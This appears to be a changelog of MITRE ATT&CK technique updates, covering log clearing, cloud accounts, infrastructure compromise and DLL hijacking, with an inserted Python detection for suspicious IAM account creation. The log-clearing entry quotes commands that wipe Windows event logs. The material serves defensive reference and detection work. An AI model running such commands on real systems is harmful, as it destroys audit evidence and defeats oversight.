x_mitre_contributors: Tim (Wadhwa-)Brown
x_mitre_contributors: Yves Yonan
x_mitre_platforms: Linux

[T1070.003] Indicator Removal: Clear Command History

Current version: 1.5

Version changed from: 1.4 → 1.5

New Detections:

Details
values_changed
STIX Field: Old value → New value
modified: 2023-04-07 17:20:44.770000+00:00 → 2024-02-14 20:07:44.756000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.4 → 1.5
iterable_item_added
STIX Field: New value
x_mitre_data_sources: Process: Process Creation

[T1070.001] Indicator Removal: Clear Windows Event Logs

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.

The event logs can be cleared with the following utility commands:

* `wevtutil cl system`
* `wevtutil cl application`
* `wevtutil cl security`

These logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001). For example, adversaries may use the PowerShell command `Remove-EventLog -LogName Security` to delete the Security EventLog and after reboot, disable future logging. Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot.(Citation: disable_win_evt_logging)

New Description
Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.

With administrator privileges, the event logs can be cleared with the following utility commands:

* `wevtutil cl system`
* `wevtutil cl application`
* `wevtutil cl security`

These logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001). For example, adversaries may use the PowerShell command `Remove-EventLog -LogName Security` to delete the Security EventLog and after reboot, disable future logging.

Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot.(Citation: disable_win_evt_logging)

Adversaries may also attempt to clear logs by directly deleting the stored log files within `C:\Windows\System32\winevt\logs\`.
Details
dictionary_item_removed
STIX Field: Removed value
x_mitre_system_requirements: ['Clearing the Windows event logs requires Administrator permissions']
values_changed
STIX Field: Old value → New value
modified: 2023-08-11 21:43:04.568000+00:00 → 2024-04-16 12:40:58.536000+00:00
description: see Old Description and New Description above
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.3 → 1.4

[T1136.003] Create Account: Cloud Account

Current version: 1.5

Version changed from: 1.4 → 1.5


Old Description
Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users) Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection. Once an adversary has created a cloud account, they can then manipulate that account to ensure persistence and allow access to additional resources - for example, by adding [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) or assigning [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003).

New Description
Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users) In addition to user accounts, cloud accounts may be associated with services. Cloud providers handle the concept of service accounts in different ways. In Azure, service accounts include service principals and managed identities, which can be linked to various resources such as OAuth applications, serverless functions, and virtual machines in order to grant those resources permissions to perform various activities in the environment.(Citation: Microsoft Entra ID Service Principals) In GCP, service accounts can also be linked to specific resources, as well as be impersonated by other accounts for [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005).(Citation: GCP Service Accounts) While AWS has no specific concept of service accounts, resources can be directly granted permission to assume roles.(Citation: AWS Instance Profiles)(Citation: AWS Lambda Execution Role) Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection. Once an adversary has created a cloud account, they can then manipulate that account to ensure persistence and allow access to additional resources - for example, by adding [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) or assigning [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003).
Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-16 17:34:42.544000+00:002024-03-28 16:14:28.678000+00:00
description (Old value): Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users) Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection. Once an adversary has created a cloud account, they can then manipulate that account to ensure persistence and allow access to additional resources - for example, by adding [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) or assigning [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003).
description (New value): Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users) In addition to user accounts, cloud accounts may be associated with services. Cloud providers handle the concept of service accounts in different ways. In Azure, service accounts include service principals and managed identities, which can be linked to various resources such as OAuth applications, serverless functions, and virtual machines in order to grant those resources permissions to perform various activities in the environment.(Citation: Microsoft Entra ID Service Principals) In GCP, service accounts can also be linked to specific resources, as well as be impersonated by other accounts for [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005).(Citation: GCP Service Accounts) While AWS has no specific concept of service accounts, resources can be directly granted permission to assume roles.(Citation: AWS Instance Profiles)(Citation: AWS Lambda Execution Role) Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection. Once an adversary has created a cloud account, they can then manipulate that account to ensure persistence and allow access to additional resources - for example, by adding [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) or assigning [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003).
x_mitre_version | 1.4 | 1.5
iterable_item_added
STIX Field | Old value | New Value
external_references | | {'source_name': 'AWS Lambda Execution Role', 'description': 'AWS. (n.d.). Lambda execution role. Retrieved February 28, 2024.', 'url': 'https://docs.aws.amazon.com/lambda/latest/dg/lambda-intro-execution-role.html'}
external_references | | {'source_name': 'AWS Instance Profiles', 'description': 'AWS. (n.d.). Using instance profiles. Retrieved February 28, 2024.', 'url': 'https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html'}
external_references | | {'source_name': 'GCP Service Accounts', 'description': 'Google. (n.d.). Service Accounts Overview. Retrieved February 28, 2024.', 'url': 'https://cloud.google.com/iam/docs/service-account-overview'}
external_references | | {'source_name': 'Microsoft Entra ID Service Principals', 'description': 'Microsoft. (2023, December 15). Application and service principal objects in Microsoft Entra ID. Retrieved February 28, 2024.', 'url': 'https://learn.microsoft.com/en-us/entra/identity-platform/app-objects-and-service-principals?tabs=browser'}
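The follow-on pattern in the updated T1136.003 text (create an account, then give it credentials or roles) is what a detection should key on rather than the account-creation call alone. The Python below is an added example, not part of this changelog or of ATT&CK: it correlates CloudTrail-style IAM events by the name of the created user and reports when that user receives keys, a console password or a policy within a short window. The event names are the real AWS IAM API actions, but the records, the account ID and user names, the 30-minute window and the mapping of actions to T1098.001/T1098.003 are this example's own assumptions.

```python
"""Correlate 'create cloud account' events with follow-on credential or role
manipulation (T1136.003 followed by T1098.001 / T1098.003).

The event dicts mimic a few AWS CloudTrail fields (eventTime, eventName,
userIdentity.arn, requestParameters). The records are constructed for this
example and do not come from any real environment.
"""
from __future__ import annotations

from collections import defaultdict
from datetime import datetime, timedelta

# Follow-on IAM actions that turn a fresh account into a durable foothold.
# The sub-technique mapping is this example's interpretation.
FOLLOW_ON = {
    "CreateAccessKey": "T1098.001",    # Additional Cloud Credentials
    "CreateLoginProfile": "T1098.001",
    "AttachUserPolicy": "T1098.003",   # Additional Cloud Roles
    "PutUserPolicy": "T1098.003",
    "AddUserToGroup": "T1098.003",
}

WINDOW = timedelta(minutes=30)  # assumed correlation window


def _ts(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def correlate(events: list[dict]) -> list[dict]:
    """One finding per CreateUser that is followed, within WINDOW, by a
    credential or role change targeting the newly created user."""
    events = sorted(events, key=lambda e: _ts(e["eventTime"]))
    created: dict[str, dict] = {}            # new user name -> CreateUser event
    follow: dict[str, list] = defaultdict(list)

    for ev in events:
        name = ev.get("requestParameters", {}).get("userName")
        if ev["eventName"] == "CreateUser" and name:
            created[name] = ev
            continue
        technique = FOLLOW_ON.get(ev["eventName"])
        if technique and name in created:
            if _ts(ev["eventTime"]) - _ts(created[name]["eventTime"]) <= WINDOW:
                follow[name].append((ev, technique))

    findings = []
    for name, create_ev in created.items():
        if not follow[name]:
            continue
        actors = {e["userIdentity"]["arn"] for e, _ in follow[name]}
        findings.append({
            "new_user": name,
            "creator": create_ev["userIdentity"]["arn"],
            "techniques": sorted({t for _, t in follow[name]}),
            "actions": [e["eventName"] for e, _ in follow[name]],
            # The new account acting on itself is the strongest signal.
            "self_service": any(a.endswith(f"user/{name}") for a in actors),
        })
    return findings


# Constructed sample records (not real CloudTrail data).
SAMPLE_EVENTS = [
    {"eventTime": "2024-03-01T10:00:00Z", "eventName": "CreateUser",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/compromised-admin"},
     "requestParameters": {"userName": "svc-backup2"}},
    {"eventTime": "2024-03-01T10:01:10Z", "eventName": "CreateAccessKey",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/compromised-admin"},
     "requestParameters": {"userName": "svc-backup2"}},
    {"eventTime": "2024-03-01T10:02:00Z", "eventName": "AttachUserPolicy",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/compromised-admin"},
     "requestParameters": {"userName": "svc-backup2",
                           "policyArn": "arn:aws:iam::aws:policy/AdministratorAccess"}},
    {"eventTime": "2024-03-01T10:05:00Z", "eventName": "CreateAccessKey",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/svc-backup2"},
     "requestParameters": {"userName": "svc-backup2"}},
    # Benign onboarding: the password is set hours later, outside the window.
    {"eventTime": "2024-03-01T11:00:00Z", "eventName": "CreateUser",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/hr-automation"},
     "requestParameters": {"userName": "new.hire"}},
    {"eventTime": "2024-03-01T14:00:00Z", "eventName": "CreateLoginProfile",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/hr-automation"},
     "requestParameters": {"userName": "new.hire"}},
]

if __name__ == "__main__":
    for finding in correlate(SAMPLE_EVENTS):
        print(finding)
```

The same shape carries over to Entra ID audit logs ("Add user" followed by "Add service principal credentials" or role assignment) and to GCP admin activity logs (CreateServiceAccount followed by CreateServiceAccountKey or SetIamPolicy); only the field names and action names change.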

[T1078.004] Valid Accounts: Cloud Accounts

Current version: 1.7

Version changed from: 1.6 → 1.7


Old Description
Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud or be hybrid joined between on-premises systems and the cloud through federation with other identity sources such as Windows Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) Service or user accounts may be targeted by adversaries through [Brute Force](https://attack.mitre.org/techniques/T1110), [Phishing](https://attack.mitre.org/techniques/T1566), or various other means to gain access to the environment. Federated accounts may be a pathway for the adversary to affect both on-premises systems and cloud environments. An adversary may create long lasting [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) on a compromised cloud account to maintain persistence in the environment. Such credentials may also be used to bypass security controls such as multi-factor authentication. Cloud accounts may also be able to assume [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005) or other privileges through various means within the environment. Misconfigurations in role assignments or role assumption policies may allow an adversary to use these mechanisms to leverage permissions outside the intended scope of the account. Such over privileged accounts may be used to harvest sensitive data from online storage accounts and databases through [Cloud API](https://attack.mitre.org/techniques/T1059/009) or other methods.

New Description
Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud; alternatively, they may be hybrid-joined between on-premises systems and the cloud through syncing or federation with other identity sources such as Windows Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) Service or user accounts may be targeted by adversaries through [Brute Force](https://attack.mitre.org/techniques/T1110), [Phishing](https://attack.mitre.org/techniques/T1566), or various other means to gain access to the environment. Federated or synced accounts may be a pathway for the adversary to affect both on-premises systems and cloud environments - for example, by leveraging shared credentials to log onto [Remote Services](https://attack.mitre.org/techniques/T1021). High privileged cloud accounts, whether federated, synced, or cloud-only, may also allow pivoting to on-premises environments by leveraging SaaS-based [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) to run commands on hybrid-joined devices. An adversary may create long lasting [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) on a compromised cloud account to maintain persistence in the environment. Such credentials may also be used to bypass security controls such as multi-factor authentication. Cloud accounts may also be able to assume [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005) or other privileges through various means within the environment. Misconfigurations in role assignments or role assumption policies may allow an adversary to use these mechanisms to leverage permissions outside the intended scope of the account. Such over privileged accounts may be used to harvest sensitive data from online storage accounts and databases through [Cloud API](https://attack.mitre.org/techniques/T1059/009) or other methods.
Details
values_changed
STIX Field | Old value | New Value
modified | 2023-10-16 17:25:38.546000+00:00 | 2024-03-29 15:42:13.499000+00:00
description (Old value): Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud or be hybrid joined between on-premises systems and the cloud through federation with other identity sources such as Windows Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) Service or user accounts may be targeted by adversaries through [Brute Force](https://attack.mitre.org/techniques/T1110), [Phishing](https://attack.mitre.org/techniques/T1566), or various other means to gain access to the environment. Federated accounts may be a pathway for the adversary to affect both on-premises systems and cloud environments. An adversary may create long lasting [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) on a compromised cloud account to maintain persistence in the environment. Such credentials may also be used to bypass security controls such as multi-factor authentication. Cloud accounts may also be able to assume [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005) or other privileges through various means within the environment. Misconfigurations in role assignments or role assumption policies may allow an adversary to use these mechanisms to leverage permissions outside the intended scope of the account. Such over privileged accounts may be used to harvest sensitive data from online storage accounts and databases through [Cloud API](https://attack.mitre.org/techniques/T1059/009) or other methods.
description (New value): Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud; alternatively, they may be hybrid-joined between on-premises systems and the cloud through syncing or federation with other identity sources such as Windows Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) Service or user accounts may be targeted by adversaries through [Brute Force](https://attack.mitre.org/techniques/T1110), [Phishing](https://attack.mitre.org/techniques/T1566), or various other means to gain access to the environment. Federated or synced accounts may be a pathway for the adversary to affect both on-premises systems and cloud environments - for example, by leveraging shared credentials to log onto [Remote Services](https://attack.mitre.org/techniques/T1021). High privileged cloud accounts, whether federated, synced, or cloud-only, may also allow pivoting to on-premises environments by leveraging SaaS-based [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) to run commands on hybrid-joined devices. An adversary may create long lasting [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) on a compromised cloud account to maintain persistence in the environment. Such credentials may also be used to bypass security controls such as multi-factor authentication. Cloud accounts may also be able to assume [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005) or other privileges through various means within the environment. Misconfigurations in role assignments or role assumption policies may allow an adversary to use these mechanisms to leverage permissions outside the intended scope of the account. Such over privileged accounts may be used to harvest sensitive data from online storage accounts and databases through [Cloud API](https://attack.mitre.org/techniques/T1059/009) or other methods.
x_mitre_version | 1.6 | 1.7

[T1538] Cloud Service Dashboard

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX Field | Old value | New Value
modified | 2023-10-16 16:51:02.852000+00:00 | 2024-04-19 04:25:33.300000+00:00
x_mitre_version | 1.2 | 1.3
iterable_item_added
STIX Field | Old value | New Value
x_mitre_contributors | | Obsidian Security
x_mitre_platforms | | SaaS

[T1584] Compromise Infrastructure

Current version: 1.5

Version changed from: 1.4 → 1.5


Old Description
Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage. Use of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may also compromise infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090) and/or proxyware services.(Citation: amnesty_nso_pegasus)(Citation: Sysdig Proxyjacking) By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)

New Description
Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage. Use of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may also compromise infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090) and/or proxyware services.(Citation: amnesty_nso_pegasus)(Citation: Sysdig Proxyjacking) By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)
Details
values_changed
STIX Field | Old value | New Value
modified | 2023-10-02 01:10:49.053000+00:00 | 2024-03-28 03:53:28.299000+00:00
description (Old value): Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage. Use of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may also compromise infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090) and/or proxyware services.(Citation: amnesty_nso_pegasus)(Citation: Sysdig Proxyjacking) By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)
description (New value): Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage. Use of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may also compromise infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090) and/or proxyware services.(Citation: amnesty_nso_pegasus)(Citation: Sysdig Proxyjacking) By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)
x_mitre_version | 1.4 | 1.5

[T1195.001] Supply Chain Compromise: Compromise Software Dependencies and Development Tools

Current version: 1.2

Version changed from: 1.1 → 1.2

New Mitigations:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-28 16:03:59.172000+00:00 | 2024-04-13 14:47:31.204000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.1 | 1.2

[T1543] Create or Modify System Process

Current version: 1.2

Version changed from: 1.1 → 1.2

New Mitigations:

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-20 16:52:58.415000+00:00 | 2024-02-15 14:14:03.942000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.1 | 1.2
iterable_item_added
STIX Field | Old value | New Value
x_mitre_data_sources | | Container: Container Creation
x_mitre_platforms | | Containers

[T1110.004] Brute Force: Credential Stuffing

Current version: 1.5

Version changed from: 1.4 → 1.5

Details
values_changed
STIX Field | Old value | New Value
modified | 2023-10-16 16:53:12.789000+00:00 | 2024-03-07 14:28:02.910000+00:00
x_mitre_version | 1.4 | 1.5
iterable_item_added
STIX Field | Old value | New Value
x_mitre_platforms | | Network

[T1555] Credentials from Password Stores

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications and services that store passwords to make them easier for users to manage and maintain, such as password managers and cloud secrets vaults. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.

New Description
Adversaries may search for common password storage locations to obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications and services that store passwords to make them easier for users to manage and maintain, such as password managers and cloud secrets vaults. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.

New Mitigations:

Details
values_changed
STIX Field | Old value | New Value
modified | 2023-09-30 20:16:41.759000+00:00 | 2024-02-26 14:19:09.417000+00:00
description (Old value): Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications and services that store passwords to make them easier for users to manage and maintain, such as password managers and cloud secrets vaults. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.
description (New value): Adversaries may search for common password storage locations to obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications and services that store passwords to make them easier for users to manage and maintain, such as password managers and cloud secrets vaults. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.
x_mitre_version | 1.1 | 1.2
iterable_item_added
STIX Field | Old value | New Value
external_references | | {'source_name': 'F-Secure The Dukes', 'description': 'F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.', 'url': 'https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf'}

[T1574.001] Hijack Execution Flow: DLL Search Order Hijacking

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution. There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637) Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking) If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.

New Description
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution. There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637) Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module. Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking) If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2023-03-30 21:01:51.098000+00:00 | 2024-04-18 22:54:54.668000+00:00
description (Old value): Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution. There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637) Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking) If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, 